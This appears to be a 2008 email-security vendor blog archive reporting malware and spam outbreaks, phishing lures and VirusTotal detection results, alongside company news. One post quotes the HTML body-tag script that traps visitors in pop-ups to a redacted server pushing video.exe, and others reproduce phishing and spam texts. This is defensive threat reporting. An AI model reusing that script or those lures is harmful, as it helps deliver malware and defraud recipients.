Outbreak of vertical Chinese spam
June 25, 2008 Leave a Comment
Our friends at Commtouch have identified an outbreak of vertical Chinese spam. Quite some interesting reading if you ask me.
How does the zero hour anti virus of MX Lab performs?
June 23, 2008 2 Comments
Virus outbreaks like in the past when tons of emails contained a virus, trojan or other malicious file attached are rare these days.
Distributors of these kind of mailicious codings are using other techniques to get their files on your computer. By email they try to attract your attention and get you clicking on a link to visit a web site. This web site then contains a script than will download the virus, trojan, or whatever malafide piece of code on your desktop. It is then very likely that you computer could be part of a zombie botnet.
However, virusses by email aren’t dead yet. During the last few weeks MX Lab has detected and intercepted emails with new virus variants. These virusses are attached to an email that mentions “You have received a Hallmark E-Card” or “Hot Pictures” and packed in a .zip or .rar archive.
Let’s find out how MX Lab performs with the zero hour anti virus technolgy and why you still need a very good anti virus scanning and filtering service.
How does the zero hour anti virus of MX Lab performs?
At 20:55 – local Belgium time – MX Lab detected some emails containing a .rar archive that where intercepted by our zero hour anti virus. The emails are in the German language with subjects like Abbuchungserlaubnis, Ihr neuer Arbeitsvertrag and Tilgungvertrag. This is an example of the content:
Sehr geehrter Kunde, sehr geehrte Kundin!
Ihr Abbuchungsauftrag Nr. 418541651249 wurde erfullt.
Ein Betrag von 2927.00 EURO wurde abgebucht und wird in Ihrem Bankauszug als “Paypalabbuchung ” angezeigt.
Sie finden die Details zu der Rechnung im AnhangPayPal (Europe) S.224; r.l. & Cie, S.C.A.
22-24 Boulevard Royal
L-2449 LuxembourgVertretungsberechtigter: Brent Bellm
Handelsregisternummer: R.C.S. Luxembourg B 118 349
At 22:04 we analysed the email and send the extracted Rechnung.exe file to Virus Total. Virus Total will scan each uploaded file to 34 anti virus engines.
This is the result: only 13 of the 34 anti virus engines did detect the virus!
Antivirus Version Last Update Result AhnLab-V3 - - - AntiVir - - - Authentium - - W32/Trojan2.ASYN Avast - - - AVG - - - BitDefender - - - CAT-QuickHeal - - (Suspicious) – DNAScan ClamAV - - PUA.Packed.NPack-2 DrWeb - - - eSafe - - - eTrust-Vet - - - Ewido - - - F-Prot - - - F-Secure - - Suspicious:W32/Malware!Gemini Fortinet - - - GData - - - Ikarus - - Win32.Outbreak Kaspersky - - - McAfee - - New Malware.co Microsoft - - Trojan:Win32/Zbot.CX NOD32v2 - - - Norman - - - Panda - - Suspicious file Prevx1 - - - Rising - - - Sophos - - Sus/UnkPacker Sunbelt - - VIPRE.Suspicious Symantec - - - TheHacker - - W32/Behav-Heuristic-068 TrendMicro - - PAK_Generic.002 VBA32 - - - VirusBuster - - - Webwasher-Gateway - - Win32.Malware.gen (suspicious)
Conclusion
With some major anti virus software vendors like Kaspersky, Symantec, Avast, Bitdefender,… don’t have a detection for this one you could face a serious security risk when you handle the incoming email without some attention. It is not the first time that we notice such a low detection rate when we analyse a file at Virus Total.
It is clear that some signature based anti virus engine alone aren’t sufficient. Combined with the zero hour anti virus service of MX Lab you will have a much better protection against virusses.
New malware outbreak tries to infect your computer with Trojan.Downloader
June 19, 2008 Leave a Comment
The latest malware outbreak sends emails with subject lines such as: Paris Hilton found to be gay!, China Earthquake claims 1 million lives, Star Trek star dies at age 79, Man wakes up from 40 year coma, Batman latest movie bombs at box office or Italy knocked out of Euro 2008 tries to attract us. So far, over 500 emails have been intercepted within 40 minutes.
The email content is on two lines only. Content can be anything like “Don’t belittle the effects of power enlargement ” to “Don’t make the postman make too many attempted deliveries to get you the herbal solution that will change your life” or “Heir to Prada empire found strangled”. The malicious link is in the format of http://****.de/r.html and this will redirect you to PornTube, a YouTube design ripp off.
And no, we are not giving you a full screenshot of this web site. 
Once you get there, a link behind the scenes is made to a server IP xx.xxx.xx.xx/index.php with some scripting in the HTML body tag: <body onbeforeunload=”window.open(‘http://xx.xxx.xx.xx/index.php’);” onunload=”window.open(‘http://xx.xxx.xx.xx/index.php’);” onclose=”window.open(‘http://xx.xxx.xx.xx/index.php’);” id=”mainbody”>
With this connection will try to download the file video.exe directly to your computer. Some pop up windows will appear stating that you need to download an ActiveX Object to run the videos and it doesn’t matter if you click Cancel or No, you get stuck in a loop until you download the video.exe. Closing down your windows or browser is the only option. Andf you get a new browser window opening the browser at this server again.
As far as I investigated this for now, it appears that the URLs http://****.de/r.html used in this malware outbreak, which are changing quite rapidly, could be in fact hacked servers hosting valid web sites where the r.html file is placed in the web hosting root of the site. Some images are missing and that’s why the design of PornTube isn’t exactly like the design of YouTube. The IP address is according to a WHOIS registered in Amsterdam, The Netherlands. The video.exe is a variant Trojan.Downloader.Win32Agent.tyw.
High oil prices inspire spammers
June 19, 2008 Leave a Comment
Even spammers have noticed the high oil prices and are offering really good deals.
Hi Emarketer,
With over 20,000 satisfied customers worldwide and 900 registered manufacturers, Water4Gas is quickly becoming the web’s standard for DIY technology to save fuel using WATER!
Water4Gas is running a limited-time F’ree Gift athttp://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118
They are offering a 7-day e-mail course so you can learn this in your spare time, daily. This course is normally priced at $49.95 but FOR A LIMITED TIME ONLY are giving it away FREE to a limited number of students. (Deadline unknown, may disappear any moment.)You do NOT have to buy anything or answer any questions!!! I just want you to have this information. Each lesson is easy and short. In about 10 minutes a day you will discover the simplicity and power of using water to clean emissions and save tons of fuel in your car or truck.
Also in this course: ways to MAKE MONEY from this!
If you’ve been searching for a unique way to SAVE $$$ ON FUEL, grab this f’ree deal – perfect for this time of rising gas costs:
http://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118
Happy Mileage!Gerald Aumaugher
gerald@aumaugher.us
251 CR 2603
Pittsburg, TX
903-231-4040
As you may know already, I never follow the complete URLs they provide me in the spam. I love to take a look around on their server. The domain www.*****.com just contains the text “Placeholder for *****.com”.
Following the complete link we get to http://******.info/water4fuel.
When looking further on http://******.info/index.php I get a web site with the title Spider Web Marketing. The site contains some articles regarding this this Water4Gas promo and it seems like there are more promotions and email campaigns texts as well from the past. Okay, back to the main objective.
A very loveley Rachel welcomes you as a visitor on runyourcaronwater.com. The URLs mentioned doesn’t match quite well. But that’s a minor issue.
Looks very promising, no more high priced fuel needed but just water to keep on driving. “Create your own water hybrid for under $150!”. Let’s read further. I only need approx less than $60 on raw materials and the price of all this is at the bottom of the page. Let’s keep on scrolling further down and there we have it. The regular value is $297 dollars but we can get it at $49,97. What a saving!
Too good to be true if you ask me.
Latest clients
June 17, 2008 Leave a Comment
Our latest clients include:
Khainata – Webdesigners
This ISP from Bolivia offers web design, hosting, streaming and domain registration services for its clients. Khainata – Webdesigners have choosen MX Lab after setting up a trial.
FXR Consultores, S.A. de C.V.
FXR offers IT consulting, network integration, computer equipment and web design services in Mexico.
MC-SQUARE
MC-SQUARE, Belgium, provides a comprehensive range of office solutions. MX Lab provides protection for the .be, .com and .nl MC-SQUARE domains.
Marketers and Blocked Email Images
June 11, 2008 1 Comment
“Over 50 percent of images in promotional emails are routinely blocked by email and webmail programs, says a recent survey by the Email Experience Council (eec), the email marketing arm of the Direct Marketing Association (DMA), writes MarketingCharts.”
This article states that 57% of these campaigns are almost completely image based. These campaigns are likely to have a higher catch rate by spamfilters and anti spam counter measures deployed on the local computer. Not to forget that most email clients now turn off showing images in the email body from external online sources for security reasons.
Now, take out an standard Spamassassin installation with the default rules and analyse some emails with text/images and image only based email. You will notice that Spamassassin will give the image based only email some extra scoring. The email with text and images will have a lower scoring. The lower scoring could have as a result that the message gets delivered while the image only based email is placed in quarantine or being blocked as spam.
Marketeers need to be aware of the fact that image based email is often confused with spam email. Spam is also quite often only image based.
Another point is the fact that images in email clients aren’t shown by default when the message is received as this is a security feature of the email client. In this case, the message that you want to deliver as marketeer or e-campaign administrator isn’t viewable for the receiver.
Personnaly, when I receive image based only email I think it can’t be interesting, there is no content, and therefore it gets deleted.
Marketeers, and everyone else who sends newsletters or email based campaigns, needs to be aware of certain points to pass by any spam filters, get the email to the inbox and attract the receivers attention. This can only be done by offering content and information with a balance between the text and image parts. This results in building a much more complex HTML email template and some additional testing but it will be worth the effort.
Malware gives you a lot of love, or not?
June 3, 2008 Leave a Comment
Quite some “love” related messages are present in our global message logs. There is a malware outbreak going on at the moment and some campaigns are related to “love”.
The messages are simple, have subjects like “Lost In Love”, “I belong to you”, “All I need is You” and contain a romantic image. This malware site drops a Storm worm variant known as Zhelatin or Nuwar on your desktop.
A variant on this is where the spam message contains “I love you so much! http://xxx.xxx.xxx.xxx/”. The URL allows for a direct IP based connection to a server that is hosting the malware.
Another “love” campaign has the subject “Paris Hilton loves you too” and contains “You now know the importance of an increased length” in the body a link to a web site to increase your… Think you’ll get the idea? Okay then.
Not “love” related but potential dangerous mailware are the messages with the subject “Your video file e.vanherck”. The subject contains the user part of an email address. The URL allows you to download the video.exe, the Trojan-Downloader.Win32.Exchanger.cq. A regular client in the malware world.
A solution for the spoofed URLs from Google and DoubleClick
June 3, 2008 Leave a Comment
According to CNet, Google will tackle two serious issues. A cross-site scripting issue on the login page of the communication platform Grand Central but more important, well if you receive this type of spam, is the URL spoofing technique that spammers use.
On this blog I have posted, in May, an article about that also DoublClick URLs are being used in spam like Google. As a result, email users click on the URL that appears to direct you to Google.com but instead redirects you to a potential malicious site or an web site advertised by the spammer like an online pharmacy.
“Open URL redirection is an issue we take very seriously. As we become aware of open URL redirectors on google.com, we actively work to close them. We are also aware of redirectors using doubleclick.com and are working to address this issue,” the Google spokesman said.
This sound great. Now it is time for the spammer to develop a new technique. Fingers crossed.
MX Lab Admin receives an update
June 2, 2008 Leave a Comment
MX Lab provides a new major update of MX Lab Admin, the management interface for clients. The update includes new features, support for multiple languages, interface enhancements like date range selector tools, animated Flash charts, new statistics reports and more.
